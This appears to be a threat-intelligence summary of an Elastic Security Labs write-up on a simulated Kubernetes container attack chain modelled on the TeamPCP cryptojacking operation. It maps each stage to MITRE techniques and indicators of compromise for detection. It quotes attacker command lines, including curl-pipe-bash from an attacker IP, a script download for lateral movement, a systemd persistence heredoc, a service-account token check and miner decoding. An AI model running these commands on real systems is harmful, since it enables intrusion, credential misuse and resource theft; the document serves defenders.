This article walks through a simulated container attack chain based on the TeamPCP cloud-native cryptojacking and ransomware operation, showing how Defend for Containers (D4C) telemetry surfaces each stage from initial execution through persistence, lateral movement, tunneling, and miner deployment. By mapping observable runtime behavior to detection logic and correlating D4C runtime events with Kubernetes audit logs, the analysis demonstrates how to detect complex, multi-stage compromises across containers and the control plane. #TeamPCP #Kubernetes
Keypoints
- Attack begins with download-and-execute (curl | bash) to gain interactive execution inside a container, which D4C detects via process lineage and interactive flags.
- Threat actor checks for Kubernetes service account tokens and enumerates environment and file paths to determine whether cluster-wide propagation is possible.
- Lateral movement is achieved by downloading and running a kube.py script that uses a stolen service account token to enumerate and execute across pods and nodes.
- Persistence attempts include writing systemd service units from within a container, an anomalous action indicating possible host-level impact or escape.
- Attackers stage tooling at runtime (apk/apt installs), deploy tunneling/proxy tools (frps, gost, socat, SSH) for external connectivity, and reconstruct and run a base64-encoded miner (xmrig) for monetization.
- Correlating D4C runtime telemetry with Kubernetes audit logs and using Attack Discovery produces a coherent kill chain that maps execution, discovery, persistence, privilege escalation, C2, and impact.
MITRE Techniques
- [T1059.004 ] Command and Scripting Interpreter – Used for interactive shell and interpreter execution (e.g., curl | bash and python -c payloads). Quote: ‘curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash’
- [T1105 ] Ingress Tool Transfer – Downloading remote scripts and tools into the container for execution. Quote: ‘curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py’
- [T1543.003 ] Create or Modify System Process: systemd – Attempting to establish persistence by writing a systemd unit from inside a container. Quote: ‘cat>/etc/systemd/system/teampcp-react.service<<SVCEOF … ExecStart=/usr/bin/python3 ${dir}/react.py … SVCEOF’
- [T1078 ] Valid Accounts – Using an existing Kubernetes service account token to access the API and perform cluster enumeration and actions. Quote: ‘if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]’
- [T1090 ] Proxy – Deploying tunneling and proxy tooling to expose internal services and maintain remote access (frps, gost, socat, SSH tunneling). Quote: ‘deploy tunneling and proxy tooling such as frps and gost to expose internal services’
- [T1083 ] File and Directory Discovery – Checking for specific files and sensitive locations to determine environment and privilege (service account token, environment variables, sensitive file paths). Quote: ‘the dropped scripts enumerate environment variables and several sensitive file locations’
- [T1496 ] Resource Hijacking – Deploying and executing a cryptominer (xmrig) to monetize compromised resources. Quote: ‘/bin/sh -c “base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm /tmp/miner.b64″‘
Indicators of Compromise
- [IP Address ] Download/C2 servers – 67.217.57.240:666, 44.252.85.168:666
- [Domain ] Remote script/source and tooling – update.aegis.aliyun.com (used in competitor-kill/uninstall step)
- [File names/paths ] Dropped and staged payloads or service files – /tmp/k8s.py, /tmp/miner (and miner.b64), /etc/systemd/system/teampcp-react.service
- [Processes/tools ] Tunneling and monetization tools observed – gost, frps, xmrig (examples of tools executed inside containers)
- [Port ] C2/proxy listener – SOCKS5 proxy reported on port 1081 (tunneling/proxy access)
Read more: https://www.elastic.co/security-labs/teampcp-container-attack-scenario